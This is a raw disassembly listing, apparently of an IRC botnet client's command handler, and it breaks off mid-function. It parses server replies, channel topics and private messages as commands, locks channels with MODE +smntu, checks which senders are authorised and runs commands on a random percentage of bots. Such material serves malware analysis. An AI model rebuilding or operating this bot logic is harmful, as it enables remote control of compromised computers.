loc_40DCB8: ; CODE XREF: sub_40D871+2FA�j
push offset dword_41DAA4
lea eax, [ebp+var_2C8]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
lea eax, [ebp+var_2C8]
push eax
call sub_4105FB
pop ecx
lea eax, [ebp+var_2C8]
push eax
call sub_40D7E5
pop ecx
loc_40DCE5: ; CODE XREF: sub_40D871+445�j
lea eax, [ebp+var_2C8]
push eax
push offset dword_419F04
call sub_40D6CB
pop ecx
pop ecx
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DCFD: ; CODE XREF: sub_40D871+2D0�j
push offset aError ; "ERROR"
mov eax, [ebp+arg_C]
push dword ptr [eax]
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40DD25
push 0
push 0
push 0
call sub_40D366
add esp, 0Ch
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DD25: ; CODE XREF: sub_40D871+49F�j
push offset aJoin ; "JOIN"
mov eax, [ebp+arg_C]
push dword ptr [eax+4]
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40DD97
push offset byte_41EE48
push [ebp+arg_4]
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40DD97
mov eax, [ebp+arg_C]
cmp dword ptr [eax+8], 0
jz short loc_40DD97
mov eax, [ebp+arg_C]
mov eax, [eax+8]
movsx eax, byte ptr [eax]
cmp eax, 3Ah
jnz short loc_40DD74
mov eax, [ebp+arg_C]
mov eax, [eax+8]
inc eax
mov [ebp+var_7E8], eax
jmp short loc_40DD80
; ---------------------------------------------------------------------------
loc_40DD74: ; CODE XREF: sub_40D871+4F2�j
mov eax, [ebp+arg_C]
mov eax, [eax+8]
mov [ebp+var_7E8], eax
loc_40DD80: ; CODE XREF: sub_40D871+501�j
push [ebp+var_7E8]
push offset aModeSSmntu ; "MODE %s +smntu"
call sub_40D6CB
pop ecx
pop ecx
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DD97: ; CODE XREF: sub_40D871+4C8�j
; sub_40D871+4DB�j ...
push offset a001 ; "001"
mov eax, [ebp+arg_C]
push dword ptr [eax+4]
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz loc_40DE70
push 21h
mov eax, [ebp+arg_C]
push dword ptr [eax+8]
lea eax, [ebp+var_4B4]
push eax
call sub_416B58 ; strncpy
add esp, 0Ch
lea eax, [ebp+var_4B4]
push eax
push offset byte_41EE48
call sub_416B3A ; strcpy
pop ecx
pop ecx
lea eax, [ebp+var_4B4]
push eax
push offset aModeSXi ; "MODE %s +xi"
call sub_40D6CB
pop ecx
pop ecx
push offset dword_41ED48
push offset dword_41DAB4
push offset dword_419AD0
call sub_40D6CB
add esp, 0Ch
lea eax, [ebp+var_490]
push eax
call sub_40CF25
push eax
call sub_40449C
pop ecx
pop ecx
test eax, eax
jz short loc_40DE58
lea eax, [ebp+var_490]
push eax
call sub_4041B7
pop ecx
test eax, eax
jz short loc_40DE43
lea eax, [ebp+var_4B4]
push eax
push offset aUserhostS ; "USERHOST %s"
call sub_40D6CB
pop ecx
pop ecx
jmp short loc_40DE56
; ---------------------------------------------------------------------------
loc_40DE43: ; CODE XREF: sub_40D871+5BB�j
lea eax, [ebp+var_490]
push eax
push offset dword_41EF48
call sub_416B3A ; strcpy
pop ecx
pop ecx
loc_40DE56: ; CODE XREF: sub_40D871+5D0�j
jmp short loc_40DE6B
; ---------------------------------------------------------------------------
loc_40DE58: ; CODE XREF: sub_40D871+5AA�j
lea eax, [ebp+var_4B4]
push eax
push offset aUserhostS ; "USERHOST %s"
call sub_40D6CB
pop ecx
pop ecx
loc_40DE6B: ; CODE XREF: sub_40D871:loc_40DE56�j
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DE70: ; CODE XREF: sub_40D871+53A�j
push offset a451 ; "451"
mov eax, [ebp+arg_C]
push dword ptr [eax+4]
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40DE96
push 0
push 1
call sub_40D043
pop ecx
pop ecx
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DE96: ; CODE XREF: sub_40D871+613�j
push offset a302 ; "302"
mov eax, [ebp+arg_C]
push dword ptr [eax+4]
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz loc_40DF3E
mov eax, [ebp+arg_C]
cmp dword ptr [eax+0Ch], 0
jnz short loc_40DEBE
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DEBE: ; CODE XREF: sub_40D871+646�j
push offset a@ ; "@"
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
call sub_416BA8 ; strstr
pop ecx
pop ecx
mov [ebp+var_5B8], eax
cmp [ebp+var_5B8], 0
jnz short loc_40DEE4
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DEE4: ; CODE XREF: sub_40D871+66C�j
push 100h
mov eax, [ebp+var_5B8]
inc eax
push eax
push offset dword_41EF48
call sub_407A56
add esp, 0Ch
lea eax, [ebp+var_5B4]
push eax
mov eax, [ebp+var_5B8]
inc eax
push eax
call sub_404612
pop ecx
pop ecx
movzx eax, al
test eax, eax
jnz short loc_40DF20
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DF20: ; CODE XREF: sub_40D871+6A8�j
push 100h
lea eax, [ebp+var_5B4]
push eax
push offset dword_41EF48
call sub_407A56
add esp, 0Ch
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DF3E: ; CODE XREF: sub_40D871+639�j
push offset aNick ; "NICK"
mov eax, [ebp+arg_C]
push dword ptr [eax+4]
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40DF8E
mov eax, [ebp+arg_C]
cmp dword ptr [eax+8], 0
jnz short loc_40DF62
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DF62: ; CODE XREF: sub_40D871+6EA�j
push offset byte_41EE48
push [ebp+arg_4]
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40DF89
mov eax, [ebp+arg_C]
mov eax, [eax+8]
inc eax
push eax
push offset byte_41EE48
call sub_416B3A ; strcpy
pop ecx
pop ecx
loc_40DF89: ; CODE XREF: sub_40D871+702�j
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DF8E: ; CODE XREF: sub_40D871+6E1�j
push offset a332 ; "332"
mov eax, [ebp+arg_C]
push dword ptr [eax+4]
call sub_416DDE ; strcmp
pop ecx
pop ecx
test eax, eax
jnz loc_40E128
mov eax, [ebp+arg_10]
cmp dword ptr [eax+10h], 0
jz short loc_40DFBF
mov eax, [ebp+arg_10]
mov eax, [eax+10h]
movsx eax, byte ptr [eax+1]
test eax, eax
jnz short loc_40DFC4
loc_40DFBF: ; CODE XREF: sub_40D871+73E�j
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DFC4: ; CODE XREF: sub_40D871+74C�j
mov eax, [ebp+arg_10]
mov eax, [eax+10h]
movsx eax, byte ptr [eax+1]
cmp eax, 3Dh
jnz loc_40E05F
mov eax, [ebp+arg_10]
mov eax, [eax+10h]
inc eax
push eax
mov eax, [ebp+arg_10]
mov eax, [eax+10h]
inc eax
inc eax
push eax
call sub_40E9C9
pop ecx
pop ecx
mov [ebp+var_5BC], eax
push [ebp+var_5BC]
mov eax, [ebp+arg_10]
mov eax, [eax+10h]
inc eax
push eax
call sub_40F040
pop ecx
pop ecx
mov [ebp+var_5BC], eax
push [ebp+var_5BC]
mov eax, [ebp+arg_10]
mov eax, [eax+10h]
inc eax
push eax
call sub_40EF41
pop ecx
pop ecx
mov eax, [ebp+arg_10]
cmp dword ptr [eax+14h], 0
jz short loc_40E04E
mov eax, [ebp+arg_10]
push dword ptr [eax+14h]
mov eax, [ebp+arg_10]
mov eax, [eax+10h]
mov ecx, [ebp+var_5BC]
lea eax, [eax+ecx+1]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
jmp short loc_40E05F
; ---------------------------------------------------------------------------
loc_40E04E: ; CODE XREF: sub_40D871+7BB�j
mov eax, [ebp+arg_10]
mov eax, [eax+10h]
mov ecx, [ebp+var_5BC]
and byte ptr [eax+ecx+1], 0
loc_40E05F: ; CODE XREF: sub_40D871+760�j
; sub_40D871+7DB�j
mov eax, [ebp+arg_10]
mov eax, [eax+10h]
movsx eax, byte ptr [eax+1]
test eax, eax
jz loc_40E123
lea eax, [ebp+var_7C4]
push eax
push offset asc_41A07C ; "]["
mov eax, [ebp+arg_10]
mov eax, [eax+10h]
inc eax
push eax
call sub_40813C
add esp, 0Ch
mov [ebp+var_7C0], eax
and [ebp+var_7C8], 0
loc_40E09A: ; CODE XREF: sub_40D871+8AD�j
cmp [ebp+var_7C0], 0
jnz short loc_40E0A5
jmp short loc_40E123
; ---------------------------------------------------------------------------
loc_40E0A5: ; CODE XREF: sub_40D871+830�j
; sub_40D871+851�j
mov eax, [ebp+var_7C0]
movsx eax, byte ptr [eax]
cmp eax, 20h
jz short loc_40E0B5
jmp short loc_40E0C4
; ---------------------------------------------------------------------------
loc_40E0B5: ; CODE XREF: sub_40D871+840�j
mov eax, [ebp+var_7C0]
inc eax
mov [ebp+var_7C0], eax
jmp short loc_40E0A5
; ---------------------------------------------------------------------------
loc_40E0C4: ; CODE XREF: sub_40D871+842�j
push [ebp+var_7C0]
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
push offset aLinkLink@linkP ; "link!link@link PRIVMSG %s :%s"
push 200h
lea eax, [ebp+var_7BC]
push eax
call sub_416BAE ; _snprintf
add esp, 14h
lea eax, [ebp+var_7BC]
push eax
call sub_40E618
pop ecx
lea eax, [ebp+var_7C4]
push eax
push offset asc_41A07C ; "]["
push 0
call sub_40813C
add esp, 0Ch
mov [ebp+var_7C8], eax
mov eax, [ebp+var_7C8]
mov [ebp+var_7C0], eax
jmp loc_40E09A
; ---------------------------------------------------------------------------
loc_40E123: ; CODE XREF: sub_40D871+7FA�j
; sub_40D871+832�j
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40E128: ; CODE XREF: sub_40D871+731�j
cmp [ebp+arg_0], 0
jz short loc_40E153
mov eax, [ebp+arg_C]
cmp dword ptr [eax+8], 0
jz short loc_40E153
mov eax, [ebp+arg_C]
cmp dword ptr [eax+0Ch], 0
jz short loc_40E153
push offset byte_41EE48
push [ebp+arg_4]
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40E158
loc_40E153: ; CODE XREF: sub_40D871+8BB�j
; sub_40D871+8C4�j ...
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40E158: ; CODE XREF: sub_40D871+8E0�j
mov eax, [ebp+arg_C]
mov eax, [eax+0Ch]
inc eax
mov ecx, [ebp+arg_C]
mov [ecx+0Ch], eax
mov eax, [ebp+arg_10]
mov eax, [eax+0Ch]
inc eax
mov ecx, [ebp+arg_10]
mov [ecx+0Ch], eax
push offset aPrivmsg ; "PRIVMSG"
mov eax, [ebp+arg_C]
push dword ptr [eax+4]
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40E1C0
mov eax, [ebp+arg_C]
mov eax, [eax+0Ch]
movsx eax, byte ptr [eax]
cmp eax, 1
jnz short loc_40E1AB
mov eax, [ebp+arg_4]
mov [ebp+var_90], eax
mov [ebp+var_84], 3
jmp short loc_40E1BE
; ---------------------------------------------------------------------------
loc_40E1AB: ; CODE XREF: sub_40D871+923�j
mov eax, [ebp+arg_C]
mov eax, [eax+8]
mov [ebp+var_90], eax
and [ebp+var_84], 0
loc_40E1BE: ; CODE XREF: sub_40D871+938�j
jmp short loc_40E216
; ---------------------------------------------------------------------------
loc_40E1C0: ; CODE XREF: sub_40D871+915�j
push offset aNotice ; "NOTICE"
mov eax, [ebp+arg_C]
push dword ptr [eax+4]
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40E211
mov eax, [ebp+arg_C]
mov eax, [eax+0Ch]
movsx eax, byte ptr [eax]
cmp eax, 1
jnz short loc_40E1F9
mov eax, [ebp+arg_4]
mov [ebp+var_90], eax
mov [ebp+var_84], 3
jmp short loc_40E20F
; ---------------------------------------------------------------------------
loc_40E1F9: ; CODE XREF: sub_40D871+971�j
mov eax, [ebp+arg_C]
mov eax, [eax+8]
mov [ebp+var_90], eax
mov [ebp+var_84], 1
loc_40E20F: ; CODE XREF: sub_40D871+986�j
jmp short loc_40E216
; ---------------------------------------------------------------------------
loc_40E211: ; CODE XREF: sub_40D871+963�j
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40E216: ; CODE XREF: sub_40D871:loc_40E1BE�j
; sub_40D871:loc_40E20F�j
cmp [ebp+var_84], 3
jnz loc_40E321
mov eax, [ebp+arg_C]
mov eax, [eax+0Ch]
inc eax
mov ecx, [ebp+arg_C]
mov [ecx+0Ch], eax
mov eax, [ebp+arg_10]
mov eax, [eax+0Ch]
inc eax
mov ecx, [ebp+arg_10]
mov [ecx+0Ch], eax
and [ebp+var_7CC], 0
jmp short loc_40E253
; ---------------------------------------------------------------------------
loc_40E246: ; CODE XREF: sub_40D871:loc_40E31C�j
mov eax, [ebp+var_7CC]
inc eax
mov [ebp+var_7CC], eax
loc_40E253: ; CODE XREF: sub_40D871+9D3�j
mov eax, [ebp+var_7CC]
mov ecx, [ebp+arg_C]
cmp dword ptr [ecx+eax*4], 0
jz short loc_40E26B
cmp [ebp+var_7CC], 0Fh
jnz short loc_40E2B8
loc_40E26B: ; CODE XREF: sub_40D871+9EF�j
mov eax, [ebp+var_7CC]
mov ecx, [ebp+arg_10]
push dword ptr [ecx+eax*4]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_7D4], eax
mov eax, [ebp+var_7CC]
mov ecx, [ebp+arg_C]
mov eax, [ecx+eax*4]
mov ecx, [ebp+var_7D4]
movsx eax, byte ptr [eax+ecx-1]
cmp eax, 1
jnz short loc_40E2B6
mov eax, [ebp+var_7CC]
mov ecx, [ebp+arg_C]
mov eax, [ecx+eax*4]
mov ecx, [ebp+var_7D4]
mov byte ptr [eax+ecx-1], 1
loc_40E2B6: ; CODE XREF: sub_40D871+A2C�j
jmp short loc_40E321
; ---------------------------------------------------------------------------
loc_40E2B8: ; CODE XREF: sub_40D871+9F8�j
mov eax, [ebp+var_7CC]
mov ecx, [ebp+arg_C]
push dword ptr [ecx+eax*4]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_7D0], eax
mov eax, [ebp+var_7CC]
mov ecx, [ebp+arg_C]
mov eax, [ecx+eax*4]
mov ecx, [ebp+var_7D0]
movsx eax, byte ptr [eax+ecx-1]
cmp eax, 1
jnz short loc_40E31C
mov eax, [ebp+var_7CC]
mov ecx, [ebp+arg_C]
mov eax, [ecx+eax*4]
mov ecx, [ebp+var_7D0]
and byte ptr [eax+ecx-1], 0
mov eax, [ebp+var_7CC]
mov ecx, [ebp+arg_10]
mov eax, [ecx+eax*4]
mov ecx, [ebp+var_7D0]
and byte ptr [eax+ecx-1], 0
jmp short loc_40E321
; ---------------------------------------------------------------------------
loc_40E31C: ; CODE XREF: sub_40D871+A79�j
jmp loc_40E246
; ---------------------------------------------------------------------------
loc_40E321: ; CODE XREF: sub_40D871+9AC�j
; sub_40D871:loc_40E2B6�j ...
push offset byte_41EE48
push [ebp+var_90]
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40E340
mov eax, [ebp+arg_4]
mov [ebp+var_90], eax
loc_40E340: ; CODE XREF: sub_40D871+AC4�j
push 7Ah
push 0
lea eax, [ebp+var_7C]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp+arg_10]
mov eax, [eax]
mov [ebp+var_88], eax
and [ebp+var_8C], 0
mov eax, [ebp+arg_10]
push dword ptr [eax]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_80], eax
loc_40E370: ; CODE XREF: sub_40D871:loc_40E3F2�j
cmp [ebp+var_80], 3
jnb short loc_40E378
jmp short loc_40E3F7
; ---------------------------------------------------------------------------
loc_40E378: ; CODE XREF: sub_40D871+B03�j
mov eax, [ebp+var_88]
add eax, [ebp+var_80]
movsx eax, byte ptr [eax-1]
cmp eax, 20h
jnz short loc_40E393
mov eax, [ebp+var_80]
dec eax
mov [ebp+var_80], eax
jmp short loc_40E3F2
; ---------------------------------------------------------------------------
loc_40E393: ; CODE XREF: sub_40D871+B17�j
mov eax, [ebp+var_88]
add eax, [ebp+var_80]
movsx eax, byte ptr [eax-3]
cmp eax, 20h
jnz short loc_40E3F0
mov eax, [ebp+var_88]
add eax, [ebp+var_80]
movsx eax, byte ptr [eax-2]
cmp eax, 2Dh
jnz short loc_40E3F0
mov eax, [ebp+var_88]
add eax, [ebp+var_80]
movsx eax, byte ptr [eax-1]
cmp eax, 7Ah
jg short loc_40E3F0
mov [ebp+var_8C], 1
mov eax, [ebp+var_88]
add eax, [ebp+var_80]
movsx eax, byte ptr [eax-1]
mov [ebp+eax+var_7C], 1
mov eax, [ebp+var_80]
sub eax, 3
mov [ebp+var_80], eax
jmp short loc_40E3F2
; ---------------------------------------------------------------------------
loc_40E3F0: ; CODE XREF: sub_40D871+B32�j
; sub_40D871+B44�j ...
jmp short loc_40E3F7
; ---------------------------------------------------------------------------
loc_40E3F2: ; CODE XREF: sub_40D871+B20�j
; sub_40D871+B7D�j
jmp loc_40E370
; ---------------------------------------------------------------------------
loc_40E3F7: ; CODE XREF: sub_40D871+B05�j
; sub_40D871:loc_40E3F0�j
cmp [ebp+var_8C], 0
jz loc_40E4CC
and [ebp+var_7D8], 0
jmp short loc_40E41A
; ---------------------------------------------------------------------------
loc_40E40D: ; CODE XREF: sub_40D871:loc_40E4C7�j
mov eax, [ebp+var_7D8]
inc eax
mov [ebp+var_7D8], eax
loc_40E41A: ; CODE XREF: sub_40D871+B9A�j
cmp [ebp+var_7D8], 10h
jnb loc_40E4CC
mov eax, [ebp+var_7D8]
mov ecx, [ebp+arg_10]
cmp dword ptr [ecx+eax*4], 0
jnz short loc_40E43B
jmp loc_40E4CC
; ---------------------------------------------------------------------------
loc_40E43B: ; CODE XREF: sub_40D871+BC3�j
mov eax, [ebp+var_88]
add eax, [ebp+var_80]
mov ecx, [ebp+var_7D8]
mov edx, [ebp+arg_10]
cmp [edx+ecx*4], eax
jb short loc_40E4C7
cmp [ebp+var_8C], 0
jz short loc_40E48F
cmp [ebp+var_7D8], 0
jz short loc_40E488
mov eax, [ebp+var_7D8]
mov ecx, [ebp+arg_C]
push dword ptr [ecx+eax*4-4]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp+var_7D8]
mov edx, [ebp+arg_10]
mov ecx, [edx+ecx*4-4]
and byte ptr [ecx+eax], 0
loc_40E488: ; CODE XREF: sub_40D871+BF1�j
and [ebp+var_8C], 0
loc_40E48F: ; CODE XREF: sub_40D871+BE8�j
mov eax, [ebp+var_7D8]
mov ecx, [ebp+arg_10]
mov eax, [ecx+eax*4]
and byte ptr [eax], 0
mov eax, [ebp+var_7D8]
mov ecx, [ebp+arg_C]
mov eax, [ecx+eax*4]
and byte ptr [eax], 0
mov eax, [ebp+var_7D8]
mov ecx, [ebp+arg_10]
and dword ptr [ecx+eax*4], 0
mov eax, [ebp+var_7D8]
mov ecx, [ebp+arg_C]
and dword ptr [ecx+eax*4], 0
loc_40E4C7: ; CODE XREF: sub_40D871+BDF�j
jmp loc_40E40D
; ---------------------------------------------------------------------------
loc_40E4CC: ; CODE XREF: sub_40D871+B8D�j
; sub_40D871+BB0�j ...
push offset byte_41EE48
mov eax, [ebp+arg_C]
push dword ptr [eax+8]
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40E513
mov eax, [ebp+arg_10]
add eax, 0Ch
push eax
mov eax, [ebp+arg_C]
add eax, 0Ch
push eax
lea eax, [ebp+var_7C]
push eax
push [ebp+var_84]
push [ebp+var_90]
push [ebp+arg_8]
push [ebp+arg_4]
call sub_40A9CF
add esp, 1Ch
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40E513: ; CODE XREF: sub_40D871+C6F�j
mov eax, [ebp+arg_C]
cmp dword ptr [eax+10h], 0
jnz short loc_40E521
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40E521: ; CODE XREF: sub_40D871+CA9�j
and [ebp+var_7DC], 0
push offset asc_41A070 ; "*"
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40E54A
mov [ebp+var_7DC], 1
jmp loc_40E5DE
; ---------------------------------------------------------------------------
loc_40E54A: ; CODE XREF: sub_40D871+CCB�j
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
push offset byte_41EE48
call sub_40A6EB
pop ecx
pop ecx
movzx eax, al
test eax, eax
jz short loc_40E56C
mov [ebp+var_7DC], 1
jmp short loc_40E5DE
; ---------------------------------------------------------------------------
loc_40E56C: ; CODE XREF: sub_40D871+CF0�j
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
call sub_416B40 ; strlen
pop ecx
cmp eax, 4
ja short loc_40E5DE
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp+arg_C]
mov ecx, [ecx+0Ch]
movsx eax, byte ptr [ecx+eax-1]
cmp eax, 25h
jnz short loc_40E5DE
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp+arg_C]
mov ecx, [ecx+0Ch]
and byte ptr [ecx+eax-1], 0
call sub_410422
xor edx, edx
push 64h
pop ecx
div ecx
inc edx
mov [ebp+var_7E0], edx
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
call sub_416B9C ; atoi
pop ecx
cmp eax, [ebp+var_7E0]
jl short loc_40E5DE
mov [ebp+var_7DC], 1
loc_40E5DE: ; CODE XREF: sub_40D871+CD4�j
; sub_40D871+CF9�j ...
movzx eax, [ebp+var_7DC]
test eax, eax
jz short loc_40E615
mov eax, [ebp+arg_10]
add eax, 10h
push eax
mov eax, [ebp+arg_C]
add eax, 10h
push eax
lea eax, [ebp+var_7C]
push eax
push [ebp+var_84]
push [ebp+var_90]
push [ebp+arg_8]
push [ebp+arg_4]
call sub_40A9CF
add esp, 1Ch
loc_40E615: ; CODE XREF: sub_40D871+31�j
; sub_40D871+4C�j ...
pop edi
leave
retn
sub_40D871 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E618 proc near ; CODE XREF: sub_40C93C+A8�p
; sub_40D871+87F�p ...
var_1194 = dword ptr -1194h
var_1190 = dword ptr -1190h
var_118C = byte ptr -118Ch
var_1180 = dword ptr -1180h
var_114C = dword ptr -114Ch
var_1148 = dword ptr -1148h
var_1144 = dword ptr -1144h
var_113C = dword ptr -113Ch
var_1138 = dword ptr -1138h
var_1109 = byte ptr -1109h
var_1108 = byte ptr -1108h
var_1089 = byte ptr -1089h
var_1088 = byte ptr -1088h
var_88 = dword ptr -88h
var_84 = byte ptr -84h
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1194h
call sub_416BC0
and [ebp+var_4], 0
push 10h
lea eax, [ebp+var_118C]
push eax
lea eax, [ebp+var_1148]
push eax
lea eax, [ebp+var_1088]
push eax
push [ebp+arg_0]
call sub_407928
add esp, 14h
push offset a302 ; "302"
push [ebp+var_1144]
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40E66D
mov dword_41E9AC, 1
jmp short loc_40E674
; ---------------------------------------------------------------------------
loc_40E66D: ; CODE XREF: sub_40E618+47�j
and dword_41E9AC, 0
loc_40E674: ; CODE XREF: sub_40E618+53�j
cmp [ebp+var_1148], 0
jz short loc_40E686
cmp [ebp+var_1144], 0
jnz short loc_40E68B
loc_40E686: ; CODE XREF: sub_40E618+63�j
jmp locret_40E941
; ---------------------------------------------------------------------------
loc_40E68B: ; CODE XREF: sub_40E618+6C�j
push offset aPrivmsg ; "PRIVMSG"
push [ebp+var_1144]
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jz short loc_40E6BB
push offset aNotice ; "NOTICE"
push [ebp+var_1144]
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz loc_40E7A5
loc_40E6BB: ; CODE XREF: sub_40E618+87�j
cmp [ebp+var_113C], 0
jz loc_40E7A5
cmp [ebp+var_1138], 0
jnz loc_40E7A5
mov eax, [ebp+var_113C]
movsx eax, byte ptr [eax]
cmp eax, 3Ah
jnz loc_40E7A5
mov eax, [ebp+var_113C]
movsx eax, byte ptr [eax+1]
cmp eax, 3Dh
jnz loc_40E7A5
mov eax, [ebp+var_113C]
movsx eax, byte ptr [eax+2]
test eax, eax
jz loc_40E7A5
mov eax, [ebp+var_113C]
inc eax
inc eax
push eax
call sub_40EC96
pop ecx
test eax, eax
jz loc_40E7A5
mov eax, [ebp+var_113C]
inc eax
push eax
mov eax, [ebp+var_113C]
inc eax
inc eax
push eax
call sub_40E9C9
pop ecx
pop ecx
mov [ebp+var_1190], eax
push [ebp+var_1190]
mov eax, [ebp+var_113C]
inc eax
push eax
call sub_40F040
pop ecx
pop ecx
mov [ebp+var_1190], eax
push [ebp+var_1190]
mov eax, [ebp+var_113C]
inc eax
push eax
call sub_40EF41
pop ecx
pop ecx
mov eax, [ebp+var_113C]
add eax, [ebp+var_1190]
and byte ptr [eax+1], 0
push 0Dh
lea eax, [ebp+var_1180]
push eax
lea eax, [ebp+var_113C]
push eax
push [ebp+var_1180]
push [ebp+var_113C]
call sub_407928
add esp, 14h
loc_40E7A5: ; CODE XREF: sub_40E618+9D�j
; sub_40E618+AA�j ...
push offset aLinkLink@link ; "link!link@link"
push [ebp+var_1148]
call sub_416DDE ; strcmp
pop ecx
pop ecx
test eax, eax
jz loc_40E853
and [ebp+var_1194], 0
jmp short loc_40E7D5
; ---------------------------------------------------------------------------
loc_40E7C8: ; CODE XREF: sub_40E618+234�j
mov eax, [ebp+var_1194]
inc eax
mov [ebp+var_1194], eax
loc_40E7D5: ; CODE XREF: sub_40E618+1AE�j
mov eax, [ebp+var_1194]
cmp off_41DA5C[eax*4], 0
jnz short loc_40E7E7
jmp short loc_40E851
; ---------------------------------------------------------------------------
loc_40E7E7: ; CODE XREF: sub_40E618+1CB�j
mov eax, [ebp+var_1194]
push off_41DA5C[eax*4]
call sub_4105FB
pop ecx
mov eax, [ebp+var_1194]
push off_41DA5C[eax*4]
mov eax, [ebp+var_1148]
inc eax
push eax
call sub_40A5BE
pop ecx
pop ecx
movzx eax, al
test eax, eax
jz short loc_40E839
mov eax, [ebp+var_1194]
push off_41DA5C[eax*4]
call sub_4105AD
pop ecx
mov [ebp+var_4], 1
jmp short loc_40E851
; ---------------------------------------------------------------------------
loc_40E839: ; CODE XREF: sub_40E618+203�j
mov eax, [ebp+var_1194]
push off_41DA5C[eax*4]
call sub_4105AD
pop ecx
jmp loc_40E7C8
; ---------------------------------------------------------------------------
loc_40E851: ; CODE XREF: sub_40E618+1CD�j
; sub_40E618+21F�j
jmp short loc_40E85A
; ---------------------------------------------------------------------------
loc_40E853: ; CODE XREF: sub_40E618+1A1�j
mov [ebp+var_4], 1
loc_40E85A: ; CODE XREF: sub_40E618:loc_40E851�j
and [ebp+var_88], 0
mov [ebp+var_114C], 1
jmp short loc_40E87A
; ---------------------------------------------------------------------------
loc_40E86D: ; CODE XREF: sub_40E618:loc_40E90A�j
mov eax, [ebp+var_114C]
inc eax
mov [ebp+var_114C], eax
loc_40E87A: ; CODE XREF: sub_40E618+253�j
cmp [ebp+var_114C], 80h
jge loc_40E90F
mov eax, [ebp+var_1148]
add eax, [ebp+var_114C]
movsx eax, byte ptr [eax]
cmp eax, 21h
jnz short loc_40E8B6
mov [ebp+var_88], 1
mov eax, [ebp+var_114C]
and byte ptr [ebp+eax+var_88+3], 0
loc_40E8B6: ; CODE XREF: sub_40E618+284�j
cmp [ebp+var_88], 0
jnz short loc_40E8DA
mov eax, [ebp+var_1148]
add eax, [ebp+var_114C]
mov ecx, [ebp+var_114C]
mov al, [eax]
mov byte ptr [ebp+ecx+var_88+3], al
loc_40E8DA: ; CODE XREF: sub_40E618+2A5�j
mov eax, [ebp+var_1148]
add eax, [ebp+var_114C]
mov ecx, [ebp+var_114C]
mov al, [eax]
mov [ebp+ecx+var_1109], al
mov eax, [ebp+var_1148]
add eax, [ebp+var_114C]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_40E90A
jmp short loc_40E90F
; ---------------------------------------------------------------------------
loc_40E90A: ; CODE XREF: sub_40E618+2EE�j
jmp loc_40E86D
; ---------------------------------------------------------------------------
loc_40E90F: ; CODE XREF: sub_40E618+26C�j
; sub_40E618+2F0�j
and [ebp+var_5], 0
and [ebp+var_1089], 0
lea eax, [ebp+var_118C]
push eax
lea eax, [ebp+var_1148]
push eax
lea eax, [ebp+var_1108]
push eax
lea eax, [ebp+var_84]
push eax
push [ebp+var_4]
call sub_40D871
add esp, 14h
locret_40E941: ; CODE XREF: sub_40E618:loc_40E686�j
leave
retn
sub_40E618 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E943 proc near ; CODE XREF: sub_4167F1+2C9�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_0]
mov [ebp+var_4], eax
loc_40E94E: ; CODE XREF: sub_40E943+32�j
mov eax, [ebp+var_4]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
